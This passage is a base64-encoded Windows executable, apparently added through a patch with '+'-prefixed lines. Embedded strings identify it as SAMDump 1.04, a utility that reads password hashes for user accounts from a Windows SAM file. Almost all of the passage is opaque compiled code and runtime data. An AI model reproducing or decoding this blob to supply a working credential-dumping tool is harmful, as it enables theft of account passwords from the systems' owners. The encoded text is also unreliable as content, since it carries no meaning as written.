+g8QEg/8IdQ2LRVhQagj/1oPECOsGV//Wg8QEg/8IdAqD/wt0BYP/BHUTi0QkFIP/CIlFVHUHi0Qk +GIlFWDPAXV9eW4PEDMNhu0AAcbtAAHG7QABxu0AAkbtAAKG7QACxu0AAVLtAAAAHAQcHBwIHBwMH +BwcEBwcHBwcFBszMzItEJAhWi/CLVCQIOVYEdBODxgyLDfT9QACNDEmNDIg7znfoi0YEK8KD+AEb +wCPGXsPMzMzMzMzMzMzMzMzMzMyLTCQEU4vBg+EfweECg+DnwfgDi5DgDUEAjQTJjUwCBDPSihmK +wySAitCLRCQMPQCAAAB1BYDjf+sKPQBAAAB1FoDLgIgZg/oBG8BbJQBAAAAFAEAAAMPo9ID//1vH +ABYAAAC4/////8PMzMzMzMzMUT0AEAAAjUwkCHIUgekAEAAALQAQAACFAT0AEAAAc+wryIvEhQGL +4YsIi0AEUMPMg+wIgz0I+0AAAFOLXCQQdRSD+0F8CIP7Wn8Dg8Mgi8Nbg8QIw4H7AAEAAH0wgz0c ++0AAAX4NagFT6ALA//+DxAjrD4sNYPtAADPAZosEWYPgAYXAdQeLw1uDxAjDis8z0orRoWD7QAD2 +RFABgHQUuAIAAACITCQIxkQkCgCIXCQJ6w64AQAAAIhcJAjGRCQJAI1MJARqAGoDixUI+0AAUVCN +RCQYUGgAAQAAUuif7///g8QchcB1B4vDW4PECMOD+AF1CzPAikQkBFuDxAjDM8AzyYpEJAWKTCQE +weAIWwvBg8QIw8zMzMzMzMzMzMzMVYvsV4t9CFfoIwAAAFpAUOhbgf//WgvAdAlXUOiPAAAAWlpf +ycPMzMzMzMzMzMzMi0wkBPfBAwAAAHQUigFBhMB0QPfBAwAAAHXxBQAAAACLAbr//v5+A9CD8P8z +woPBBKkAAQGBdOiLQfyEwHQyhOR0JKkAAP8AdBOpAAAA/3QC682NQf+LTCQEK8HDjUH+i0wkBCvB +w41B/YtMJAQrwcONQfyLTCQEK8HDzMzMzMxXi3wkCOtqLovALovALovAi0wkBFf3wQMAAAB0D4oB +QYTAdDv3wQMAAAB18YsBuv/+/n4D0IPw/zPCg8EEqQABAYF06ItB/ITAdCOE5HQaqQAA/wB0DqkA +AAD/dALrzY15/+sNjXn+6wiNef3rA415/ItMJAz3wQMAAAB0GYoRQYTSdGSIF0f3wQMAAAB17usF +iReDxwS6//7+fosBA9CD8P8zwosRg8EEqQABAYF04YTSdDSE9nQn98IAAP8AdBL3wgAAAP90AuvH +iReLRCQIX8NmiReLRCQIxkcCAF/DZokXi0QkCF/DiBeLRCQIX8P/JSwhQQDMzMzMzMzMzMzMVYvs +V1ZTi00QC8kPhNwAAACLdQiLfQyNBQD7QACDeAgAdUu3QbNatiAui8CKJgrkigd0IQrAdB1GRzj8 +cgY43HcCAuY4+HIGONh3AgLGOMR1DUl11zPJOMQPhI4AAAC5/////w+CgwAAAPfZ63+DPeQOQQAA +fwr/BegOQQBqAOsSi9lqE+iWkv//xwQkAQAAAIvLM8Az25CKBgvAih90IwvbdB9GR1FQU+iy/P// +i9iDxAToqPz//4PEBFk7w3UJSXXVM8k7w3QJuf////9yAvfZWAvAdQj/DegOQQDrDovZahPoqJL/ +/4PEBIvLi8FbXl/JwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQICBAQHBwgICwsNDQ4OEBATExUVFhYZGRoaHBwfHyAg +IyMlJSYmKSkqKiwsLy8xMTIyNDQ3Nzg4Ozs9PT4+QEBDQ0VFRkZJSUpKTExPT1FRUlJUVFdXWFhb +W11dXl5hYWJiZGRnZ2hoa2ttbW5ucHBzc3V1dnZ5eXp6fHx/f4CAg4OFhYaGiYmKioyMj4+RkZKS +lJSXl5iYm5udnZ6eoaGioqSkp6eoqKurra2urrCws7O1tba2ubm6ury8v7/BwcLCxMTHx8jIy8vN +zc7O0NDT09XV1tbZ2dra3Nzf3+Dg4+Pl5ebm6enq6uzs7+/x8fLy9PT39/j4+/v9/f7+AAAAABAA +AAAAAAAgEAAAIAAAAQAQAAEAAAABIBAAASAACAAAEAgAAAAIACAQCAAgAAgBABAIAQAACAEgEAgB +ICAAAAAwAAAAIAAAIDAAACAgAAEAMAABACAAASAwAAEgIAgAADAIAAAgCAAgMAgAICAIAQAwCAEA +IAgBIDAIASAAAAgAEAAIAAAACCAQAAggAAAJABAACQAAAAkgEAAJIAAICAAQCAgAAAgIIBAICCAA +CAkAEAgJAAAICSAQCAkgIAAIADAACAAgAAggMAAIICAACQAwAAkAIAAJIDAACSAgCAgAMAgIACAI +CCAwCAggIAgJADAICQAgCAkgMAgJIAAAAAAAAAACACAAAAAgAAIAACAAAAAgAgAgIAAAICACBAAA +AAQAAAIEIAAABCAAAgQAIAAEACACBCAgAAQgIAIABAAAAAQAAgAkAAAAJAACAAQgAAAEIAIAJCAA +ACQgAgQEAAAEBAACBCQAAAQkAAIEBCAABAQgAgQkIAAEJCACAAAAEAAAABIAIAAQACAAEgAAIBAA +ACASACAgEAAgIBIEAAAQBAAAEgQgABAEIAASBAAgEAQAIBIEICAQBCAgEgAEABAABAASACQAEAAk +ABIABCAQAAQgEgAkIBAAJCASBAQAEAQEABIEJAAQBCQAEgQEIBAEBCASBCQgEAQkIBIAAAAAAQAA +AAAABAABAAQAAAAAAQEAAAEAAAQBAQAEAQIAAAADAAAAAgAEAAMABAACAAABAwAAAQIABAEDAAQB +AAIAAAECAAAAAgQAAQIEAAACAAEBAgABAAIEAQECBAECAgAAAwIAAAICBAADAgQAAgIAAQMCAAEC +AgQBAwIEAQAAAAgBAAAIAAAECAEABAgAAAAJAQAACQAABAkBAAQJAgAACAMAAAgCAAQIAwAECAIA +AAkDAAAJAgAECQMABAkAAgAIAQIACAACBAgBAgQIAAIACQECAAkAAgQJAQIECQICAAgDAgAIAgIE +CAMCBAgCAgAJAwIACQICBAkDAgQJAAAAAAAAEAAAAQAAAAEQAAgAAAAIABAACAEAAAgBEAAAEAAA +ABAQAAARAAAAERAACBAAAAgQEAAIEQAACBEQAAAAAAQAABAEAAEABAABEAQIAAAECAAQBAgBAAQI +ARAEABAABAAQEAQAEQAEABEQBAgQAAQIEBAECBEABAgREAQAAAIAAAASAAABAgAAARIACAACAAgA +EgAIAQIACAESAAAQAgAAEBIAABECAAAREgAIEAIACBASAAgRAgAIERIAAAACBAAAEgQAAQIEAAES +BAgAAgQIABIECAECBAgBEgQAEAIEABASBAARAgQAERIECBACBAgQEgQIEQIECBESBAAAAAAAAAAQ +AAABAAAAARAEAAAABAAAEAQAAQAEAAEQAAAAIAAAADAAAAEgAAABMAQAACAEAAAwBAABIAQAATAA +ABAAAAAQEAAAEQAAABEQBAAQAAQAEBAEABEABAAREAAAECAAABAwAAARIAAAETAEABAgBAAQMAQA +ESAEABEwABAAAAAQABAAEAEAABABEAQQAAAEEAAQBBABAAQQARAAEAAgABAAMAAQASAAEAEwBBAA +IAQQADAEEAEgBBABMAAQEAAAEBAQABARAAAQERAEEBAABBAQEAQQEQAEEBEQABAQIAAQEDAAEBEg +ABARMAQQECAEEBAwBBARIAQQETAAAAAAAAAACAgAAAAIAAAIAAQAAAAEAAgIBAAACAQACAAAAgAA +AAIICAACAAgAAggABAIAAAQCCAgEAgAIBAIIAQAAAAEAAAgJAAAACQAACAEEAAABBAAICQQAAAkE +AAgBAAIAAQACCAkAAgAJAAIIAQQCAAEEAggJBAIACQQCCAAAAAIAAAAKCAAAAggAAAoABAACAAQA +CggEAAIIBAAKAAACAgAAAgoIAAICCAACCgAEAgIABAIKCAQCAggEAgoBAAACAQAACgkAAAIJAAAK +AQQAAgEEAAoJBAACCQQACgEAAgIBAAIKCQACAgkAAgoBBAICAQQCCgkEAgIJBAIKAAAAAAABAAAA +AAgAAAEIAAAAAAEAAQABAAAIAQABCAEQAAAAEAEAABAACAAQAQgAEAAAARABAAEQAAgBEAEIAQAA +IAAAASAAAAAoAAABKAAAACABAAEgAQAAKAEAASgBEAAgABABIAAQACgAEAEoABAAIAEQASABEAAo +ARABKAEAAgAAAAMAAAACCAAAAwgAAAIAAQADAAEAAggBAAMIARACAAAQAwAAEAIIABADCAAQAgAB +EAMAARACCAEQAwgBAAIgAAADIAAAAigAAAMoAAACIAEAAyABAAIoAQADKAEQAiAAEAMgABACKAAQ +AygAEAIgARADIAEQAigBEAMoAQAAAAAAAAAEAAAEAAAABAQCAAAAAgAABAIABAACAAQEACAAAAAg +AAQAIAQAACAEBAIgAAACIAAEAiAEAAIgBAQgAAAAIAAABCAABAAgAAQEIgAAACIAAAQiAAQAIgAE +BCAgAAAgIAAEICAEACAgBAQiIAAAIiAABCIgBAAiIAQEAAgAAAAIAAQACAQAAAgEBAIIAAACCAAE +AggEAAIIBAQAKAAAACgABAAoBAAAKAQEAigAAAIoAAQCKAQAAigEBCAIAAAgCAAEIAgEACAIBAQi +CAAAIggABCIIBAAiCAQEICgAACAoAAQgKAQAICgEBCIoAAAiKAAEIigEACIoBAQACAgCAAAIAAIA +AAICCAgCAAAAAgIICAACAAgAAgAAAgIICAAACAgCAAAIAgIIAAACCAACAAAAAgAAAAACAAgAAAAI +AAIAAAAACAACAAgIAAIICAIAAAgCAggAAAAIAAICAAAAAAgAAAAICAACAAgCAAgAAAIIAAICAAgC +AAAAAAAAAAACCAgCAAgAAgIACAAACAgCAAAIAAIIAAAACAACAgAIAgAIAAAACAgAAgAAAgIICAAC +AAAAAgAAAgAACAICCAgCAAgIAAAACAICCAACAAAAAgIIAAACAAgAAAAAAAAACAAAAAACAggAAgAI +CAICAAAAAgAIAgAIAAACCAgAEIAQQAAAAAAAgBAAAAAQQBAAAEAQgAAAAIAAQACAEAAAgAAAEAAQ +QBAAAAAAgABAEAAQAACAEEAAABBAEAAAAAAAEAAQgABAEAAQQACAAAAQgBAAAAAAQAAAAAAQABAA +EIAAQBCAEAAAgBBAEAAAQAAAAEAAABAAEIAAABCAEEAQABAAAIAQQACAAEAQgBAAEIAQQBAAEAAQ +AABAAAAAAAAAAEAQgAAAAAAQABAAEEAAgAAAAAAAQBCAEAAQgABAAIAQQACAAAAAAAAAEAAAQBAA +AAAQgBBAAIAQAAAAEEAQABBAAAAQABCAAAAAgABAEIAAQBAAAAAAABBAAIAQAAEAAAQAAQQEAAEA +AAEBAAQBAAQAAAAABAEBAAQAAQQAAAEABAAABAAAAAQEAQAAAAEBBAQBAQAAAQAAAAEABAQAAAAA +AQAEAAABBAQAAQAAAQEAAAEBBAQAAAQAAQAABAEABAQAAQAEAQEEAAAABAQAAQQAAAAAAAAAAAQB +AQQAAAEEBAABAAABAAAAAAAEAAEBAAABAAQAAAAEBAEBAAQAAAAAAAEEBAABBAABAAQEAQAEAAAA +AAQBAQQEAQAAAAEBBAABAAAEAAAABAEBBAQAAAQAAAEABAEBAAQAAQQAAAEABAAAAAABAAQEAQEA +AAEAAAQBAQQAAAEAAAAABAQIEEAAABAAEAgAAAAIEEAQAAAAAAAAQBAIEAAQCABAAAAQQBAIAAAQ +AAAAEAgQAAAIAAAQCBBAAAAAQAAAAAAQCABAEAAQQAAAEAAACAAAAAAQQAAIEAAQAABAEAAQAAAI +EAAAAAAAAAgAQAAAEEAQABAAEAgAQBAIEEAQAABAAAgAQBAIEAAAAABAAAgAABAAEEAAABAAEAgA +AAAAAEAQCBAAEAAAAAAAEAAACABAAAAAAAAIAEAQABBAEAAQAAAAAAAQCBBAEAgQQAAAAEAACBBA +EAgAAAAAEAAQCBBAAAgAQAAAEEAAAABAEAgQABAIEAAAAAAAEAgAABAAEEAQAAAACAAAAQAABAAA +IAQBCCAAAQgABAAIIAQBAAAAAQgAAAEAIAAAACAAAAgABAEAIAQACCAAAQgABAEIAAAAAAAEAQAA +AAAIIAABACAEAAAABAAIIAQBAAAAAAAgAAAIIAAAACAEAAggBAEIIAABAAAAAQgABAAAIAQAAAAE +AQgABAEIIAQACCAAAQAAAAEIAAABACAAAAAgAAAIAAQACAAAAAgABAEAIAQBCAAAAAAgBAEAAAAA +CAAEAAAgAAEAIAQACAAEAAAAAAAAIAQBCCAAAQgABAEIIAQAAAAAAQAABAEAIAABCAAEAAggBAAA +IAAAACAEAQAAAAEIIAAACEAAAIBAACAAAAAAAAAgIIBAACAAACAAAEAgAIAAACAAQCAAAEAgIIAA +ICAAAAAAgAAgAIBAAACAAAAggEAgIAAAACAAQCAAgEAAIIAAAAAAACAAAEAAAAAAICCAQAAggEAg +IIAAACCAAAAAgEAgAABAAAAAACAgAEAgIAAAIACAQCAAAAAAAIAAIACAQCAgAAAgIIBAACAAAAAA +AAAgAIAAAACAACAAAEAAIIAAACAAQAAgAEAgIIAAICAAQAAAAEAgIIAAICAAAAAgAEAgAIBAAACA +AAAggEAgIAAAAAAAACAAAEAAAIBAIACAACAggAAAIIBAIAAAQAAAAEAAIIAAQAAAAAIAAAACAAEE +AAABBEIAAQRAAAAAQgAAAAAAAAAAAAEEAgABBAIAAABAAAEEAAAAAEIAAQBAAAEEAgAABAIAAQBA +AAAEQAAABEIAAQAAAAAAAgABBAAAAQBCAAAEQAABBEIAAABCAAEEAAAABEIAAARAAAEAAgAAAAAA +AQRCAAAAQAABBEAAAQQCAAAAQAAAAAIAAAAAAAEEQAABBAIAAQRCAAAAQgAAAAAAAAACAAAEAAAB +BAAAAAACAAEAAAAABAIAAQACAAEAQgAABAIAAABAAAAEQgABAAAAAQBCAAEEAAAABEAAAARCAAEE +AAABAEIAAQBAAAEEQAAAgACAIAAAgiCAAAIAAAAAAAAAAiCAAIAAAACAIIAAgiCAAAAAAAAAIAAA +ggCAAAIAgACCAIAAAiCAAAAgAACAIAAAAgCAAIIAgACAAAAAAiCAAIIggAAAIAAAAAAAAIIAAAAA +IAAAgACAAAIggACAIAAAgAAAAAIAAACCIIAAAAAAAIAAAAACAIAAACCAAIIggAACAAAAACAAAAAA +AACCAIAAgCCAAAIgAAACIIAAgAAAAIIggAAAAIAAgAAAAAIggACCIAAAgAAAAIAggAAAIAAAggCA +AAIAgAACIAAAgCCAAAAAAACCIIAAggAAAAAAAAAAIIAAgCAAAAIAgACCAHDsQACwPUAAY3Nt4AEA +AAAAAAAAAAAAAAMAAAAgBZMZAAAAAAAAAAD/////4lJAAP1SQAAAAAAA//////5fQAALYEAAAAAA +AP////8AAAAA3WFAAAAAAAC2YUAAw2FAAP////85ZEAAP2RAAAAAAAD/////qmRAALJkQABMQ19U +SU1FAExDX05VTUVSSUMAAExDX01PTkVUQVJZAExDX0NUWVBFAAAAAExDX0NPTExBVEUAAExDX0FM +TAAALgAAACgAbgB1AGwAbAApAAAAAAAobnVsbCkAAAYAAAYAAQAAEAADBgAGAhAERUVFBQUFBQU1 +MABQAAAAACAoOFBYBwgANzAwV1AHAAAgIAgAAAAACGBgYGBgYAAAcHB4eHh4CAcIAAAHAAgICAAA +CAAIAAAIAAAAcnVudGltZSBlcnJvciAAAA0KAABUTE9TUyBlcnJvcg0KAAAAU0lORyBlcnJvcg0K +AAAAAERPTUFJTiBlcnJvcg0KAABSNjAyNw0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciBsb3dpbyBp +bml0aWFsaXphdGlvbg0KAAAAAFI2MDI2DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIHN0ZGlvIGlu +aXRpYWxpemF0aW9uDQoAAAAAUjYwMjUNCi0gcHVyZSB2aXJ0dWFsIGZ1bmN0aW9uIGNhbGwNCgAA +AFI2MDI0DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIF9vbmV4aXQvYXRleGl0IHRhYmxlDQoAAAAA +UjYwMTkNCi0gdW5hYmxlIHRvIG9wZW4gY29uc29sZSBkZXZpY2UNCgAAAABSNjAxOA0KLSB1bmV4 +cGVjdGVkIGhlYXAgZXJyb3INCgAAAABSNjAxNw0KLSB1bmV4cGVjdGVkIG11bHRpdGhyZWFkIGxv +Y2sgZXJyb3INCgAAAABSNjAxNg0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciB0aHJlYWQgZGF0YQ0K +AA0KYWJub3JtYWwgcHJvZ3JhbSB0ZXJtaW5hdGlvbg0KAAAAAFI2MDA5DQotIG5vdCBlbm91Z2gg +c3BhY2UgZm9yIGVudmlyb25tZW50DQoAUjYwMDgNCi0gbm90IGVub3VnaCBzcGFjZSBmb3IgYXJn +dW1lbnRzDQoAAABSNjAwMg0KLSBmbG9hdGluZyBwb2ludCBub3QgbG9hZGVkDQoAAAAATWljcm9z +b2Z0IFZpc3VhbCBDKysgUnVudGltZSBMaWJyYXJ5AAAAAAoKAABSdW50aW1lIEVycm9yIQoKUHJv +Z3JhbTogAAAALi4uADxwcm9ncmFtIG5hbWUgdW5rbm93bj4AAAAAAAD/////AAAAAIWOQAAAAAAA +WY5AAF+OQAD/////AAAAAP2OQAAAAAAA0Y5AANeOQAB1bml0ZWQtc3RhdGVzAAAAdW5pdGVkLWtp +bmdkb20AAHVuaXRlZCBzdGF0ZXMAAAB1bml0ZWQga2luZ2RvbQAAdHduAHR1cmtleQAAdHVyAHRh +aXdhbgAAc3dpdHplcmxhbmQAc3dlZGVuAABzd2UAc3ZrAHNwYWluAAAAc291dGgta29yZWEAc291 +dGgga29yZWEAc2dwAHNpbmdhcG9yZQAAAHJ1c3NpYQAAcHJ0AHByLWNoaW5hAAAAAHByIGNoaW5h +AAAAAHBvcnR1Z2FsAAAAAHBvbGFuZAAAcG9sAG56bABuegAAbm9yd2F5AABuZXctemVhbGFuZABu +ZXcgemVhbGFuZABuZXRoZXJsYW5kcwBtZXhpY28AAG1leABrb3JlYQAAAGphcGFuAAAAaXRhbHkA +AABpcmwAaXJlbGFuZABpY2VsYW5kAGh1bmdhcnkAaG9uZy1rb25nAAAAaG9uZyBrb25nAAAAaG9s +bGFuZABoa2cAZ3JlZWNlAABncmVhdCBicml0YWluAAAAZ3JjAGdlcm1hbnkAZ2JyAGZyYW5jZQAA +ZmlubGFuZABlbmdsYW5kAGRuawBkZW5tYXJrAGN6ZQBjaG4AY2hpbmEAAABjaGUAY2FuYWRhAABj +YW4AYnJpdGFpbgBicmF6aWwAAGJyYQBiZWxnaXVtAGJlbABhdXQAYXVzdHJpYQBhdXN0cmFsaWEA +AABhdXMAYW1lcmljYQB1c2EAdXMAAHVrAAB0dXJraXNoAHRyawBzd2lzcwAAAHN3ZWRpc2gAc3Zl +AHNwYW5pc2gtbW9kZXJuAABzcGFuaXNoLW1leGljYW4Ac3BhbmlzaABzbG92YWsAAHNreQBydXNz +aWFuAHJ1cwBwdGcAcHRiAHBvcnR1Z3Vlc2UtYnJhemlsaWFuAAAAAHBvcnR1Z3Vlc2UAAHBvbGlz +aAAAcGxrAG5vcndlZ2lhbi1ueW5vcnNrAAAAbm9yd2VnaWFuLWJva21hbAAAAABub3J3ZWdpYW4A +AABub3IAbm9uAG5sZABubGIAa29yZWFuAABrb3IAanBuAGphcGFuZXNlAAAAAGl0cwBpdGFsaWFu +LXN3aXNzAAAAaXRhbGlhbgBpdGEAaXNsAGlyaXNoLWVuZ2xpc2gAAABpY2VsYW5kaWMAAABodW5n +YXJpYW4AAABodW4AZ3JlZWsAAABnZXJtYW4tc3dpc3MAAAAAZ2VybWFuLWF1c3RyaWFuAGdlcm1h +bgAAZnJzAGZyZW5jaC1zd2lzcwAAAABmcmVuY2gtY2FuYWRpYW4AZnJlbmNoLWJlbGdpYW4AAGZy +ZW5jaAAAZnJjAGZyYgBmcmEAZmlubmlzaABmaW4AZXNwAGVzbgBlc20AZW56AGVudQBlbmkAZW5n +bGlzaC11c2EAZW5nbGlzaC11cwAAZW5nbGlzaC11awAAZW5nbGlzaC1uegAAZW5nbGlzaC1pcmUA +ZW5nbGlzaC1jYW4AZW5nbGlzaC1hdXMAZW5nbGlzaC1hbWVyaWNhbgAAAABlbmdsaXNoAGVuZwBl +bmMAZW5hAGVsbABkdXRjaC1iZWxnaWFuAAAAZHV0Y2gAAABkZXUAZGVzAGRlYQBkYW5pc2gAAGRh +bgBjemVjaAAAAGNzeQBjaHQAY2hzAGNoaW5lc2UtdHJhZGl0aW9uYWwAY2hpbmVzZS1zaW5nYXBv +cmUAAABjaGluZXNlLXNpbXBsaWZpZWQAAGNoaW5lc2UtaG9uZ2tvbmcAAAAAY2hpbmVzZQBjaGkA +Y2hoAGNhbmFkaWFuAAAAAGJlbGdpYW4AYXVzdHJhbGlhbgAAYW1lcmljYW4tZW5nbGlzaAAAAABh +bWVyaWNhbiBlbmdsaXNoAAAAAGFtZXJpY2FuAAAAAAAAAAAAAAAAAAAAAEdldExhc3RBY3RpdmVQ +b3B1cAAAR2V0QWN0aXZlV2luZG93AE1lc3NhZ2VCb3hBAHVzZXIzMi5kbGwAAEg6bW06c3MAZGRk +ZCwgTU1NTSBkZCwgeXl5eQBNL2QveXkAAFBNAABBTQAARGVjZW1iZXIAAAAATm92ZW1iZXIAAAAA +T2N0b2JlcgBTZXB0ZW1iZXIAAABBdWd1c3QAAEp1bHkAAAAASnVuZQAAAABBcHJpbAAAAE1hcmNo +AAAARmVicnVhcnkAAAAASmFudWFyeQBEZWMATm92AE9jdABTZXAAQXVnAEp1bABKdW4ATWF5AEFw +cgBNYXIARmViAEphbgBTYXR1cmRheQAAAABGcmlkYXkAAFRodXJzZGF5AAAAAFdlZG5lc2RheQAA +AFR1ZXNkYXkATW9uZGF5AABTdW5kYXkAAFNhdABGcmkAVGh1AFdlZABUdWUATW9uAFN1bgAAAAAA +U3VuTW9uVHVlV2VkVGh1RnJpU2F0AAAASmFuRmViTWFyQXByTWF5SnVuSnVsQXVnU2VwT2N0Tm92 +RGVjAAAAAAAAAAAAAAAAAAAAADj0QACI7EAAAAAAAAAAAAAAAAAAAQAAAJjsQACg7EAAAAAAADj0 +QAAAAAAAAAAAAP////8AAAAAAAAAAAEAAAA48EAAAAAAAP////8AAAAABAAAAAAAAAAAAAAAAQAA +ALjsQAAAAAAAAAAAAAAAAADY7EAAAQAAAEjwQAAAAAAA/////wAAAAAEAAAAAAAAAAAAAAABAAAA +8OxAAAAAAAAAAAAAAAAAABDtQAAgBZMZAgAAAEjtQAABAAAAWO1AAAAAAAAAAAAAAAAAAP////8A +AAAA/////wAAAAAAAAAAAAAAAAEAAAABAAAAcO1AAAAAAAAAAAAAAAAAAAAAAADhF0AAIAWTGQQA +AACg7UAAAQAAAMDtQAAAAAAAAAAAAAAAAAD/////AAAAAAAAAAC3IUAAAAAAAKohQAD/////AAAA +AAAAAAACAAAAAwAAAAEAAADY7UAAAAAAAAAAAAA48EAArP///8QhQAAgBZMZAwAAAAjuQAABAAAA +IO5AAAAAAAAAAAAAAAAAAP////8AAAAAAAAAAMgjQAD/////AAAAAAAAAAABAAAAAgAAAAEAAAA4 +7kAAAAAAAAAAAAA48EAA0P///9UjQAAgBZMZAwAAAGjuQAABAAAAgO5AAAAAAAAAAAAAAAAAAP// +//8AAAAAAAAAAHMlQAD/////AAAAAAAAAAABAAAAAgAAAAEAAACY7kAAAAAAAAAAAAA48EAAxP// +/4AlQAAgBZMZAwAAAMjuQAABAAAA4O5AAAAAAAAAAAAAAAAAAP////8AAAAAAAAAAGonQAD///// +AAAAAAAAAAABAAAAAgAAAAEAAAD47kAAAAAAAAAAAAA48EAAwP///3cnQAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAgVUAAAAAAAAAAAAAATEAAcI1AAAAAAAAAAAAA0ExAAAAAAAAAAAAAAAAAAAAA +AAAAAAAABOFAAAAAAAAuSgAAAAAAAAThQAAAAAAALkgAAFwAAAByYgAAAAAAAGNoZWNrX3ZwOiBt +YWxsb2MgZmFpbCBmb3IgaG9tZWRpci4KAGNoZWNrX3ZwOiBtYWxsb2MgZmFpbCBmb3IgY29tbWVu +dC4KAGNoZWNrX3ZwOiBtYWxsb2MgZmFpbCBmb3IgdXNlcm5hbWUuCgAAAAAlMDJYAAAAADoKAAAs +AAAAJXMAADoAAABOTyBQQVNTV09SRCoqKioqKioqKioqKioqKioqKioqKgAAAAAqKioqKioqKioq +KioqKioqKioqKioqKioqKioqKioqKgAAAAAlczolZDoAAEZhaWxlZCB0byBwYXJzZSBlbnRyeSBm +b3IgUklEICVYCgAAAHByaW50b3V0X3NtYl9lbnRyeTogVW5hYmxlIHRvIHJlYWQgdXNlciAnVicg +dmFsdWUuIEVycm9yIHdhcyAlcy4KLgAAcHJpbnRvdXRfc21iX2VudHJ5OiBtYWxsb2MgZmFpbCBm +b3IgdXNlciBlbnRyeS4KAAAAAHByaW50b3V0X3NtYl9lbnRyeTogVW5hYmxlIHRvIGRldGVybWlu +ZSBzaXplIG5lZWRlZCBmb3IgdXNlciAnVicgdmFsdWUuIEVycm9yIHdhcyAlcy4KLgBWAAAAZW51 +bWVyYXRlX3VzZXJzOiBGYWlsZWQgdG8gb3BlbiBrZXkgJXMgdG8gcmVhZCB2YWx1ZS4gRXJyb3Ig +d2FzICVzLgoAAAAAX1JlZ09wZW5LZXlFeCBlcnJvcjogJWQKAAAAAFNBTVxEb21haW5zXEFjY291 +bnRcVXNlcnMAAABfUmVnT3BlbkhpdmUgZXJyb3I6ICVkCgBVc2FnZToKICBTQU1EVU1QIDxTQU0g +ZmlsZSBuYW1lPgoAAABTQU1EdW1wIDEuMDQuIENyZWF0ZWQgYnkgRG1pdHJ5IEFuZHJpYW5vdgoA +AAAAAAAAAAAAAQEBAQEBAQH+/v7+/v7+/h8fHx8fHx8f4ODg4ODg4OAB/gH+Af4B/v4B/gH+Af4B +H+Af4A7xDvHgH+Af8Q7xDgHgAeAB8QHx4AHgAfEB8QEf/h/+Dv4O/v4f/h/+Dv4OAR8BHwEOAQ4f +AR8BDgEOAeD+4P7x/vH+/uD+4P7x/vEAAAAAAAAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAAA +AAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAAAAAAAREVTIHBhcnQgb2YgU1NMZWF5IDAuNi42IDE0 +LUphbi0xOTk3AAAAAGxpYmRlcyB2IDQuMDEgLSAxMy1KYW4tMTk5NyAtIGVheQAAAAj0QADg80AA +AQAAAAThQAAAAAAALj9BVnR5cGVfaW5mb0BAAFBVQAAAAAAAAQAAABYAAAACAAAAAgAAAAMAAAAC +AAAABAAAABgAAAAFAAAADQAAAAYAAAAJAAAABwAAAAwAAAAIAAAADAAAAAkAAAAMAAAACgAAAAcA +AAALAAAACAAAAAwAAAAWAAAADQAAABYAAAAPAAAAAgAAABAAAAANAAAAEQAAABIAAAASAAAAAgAA +ACEAAAANAAAANQAAAAIAAABBAAAADQAAAEMAAAACAAAAUAAAABEAAABSAAAADQAAAFMAAAANAAAA +VwAAABYAAABZAAAACwAAAGwAAAANAAAAbQAAACAAAABwAAAAHAAAAHIAAAAJAAAABgAAABYAAACA +AAAACgAAAIEAAAAKAAAAggAAAAkAAACDAAAAFgAAAIQAAAANAAAAkQAAACkAAACeAAAADQAAAKEA +AAACAAAApAAAAAsAAACnAAAADQAAALcAAAARAAAAzgAAAAIAAADXAAAACwAAABgHAAAMAAAAIAWT +GQAAAAAAAAAAAAAAABAPQQAAAAAAEA9BAAEBAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAA +AgAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAgtBAAAAAAAAAAAAAAAAAPgLQQAAAAAAAAAAAAAAAADIC0EAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAABQVUAA +AAAAAEMAAAAAAAAAtOFAAAAAAADwbUAAqOFAAJD5QABQq0AAnOFAAJD5QACgqEAAkOFAAJD5QACg +pUAAhOFAAJD5QAAwo0AAfOFAAJD5QADAm0AAAAAAAAAAAAAAAAAAAAAAAEMAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAABDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAEAAAAuAAAAAQAAAAAAAAAAAAAA0OFAAMDhQAD/////AAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 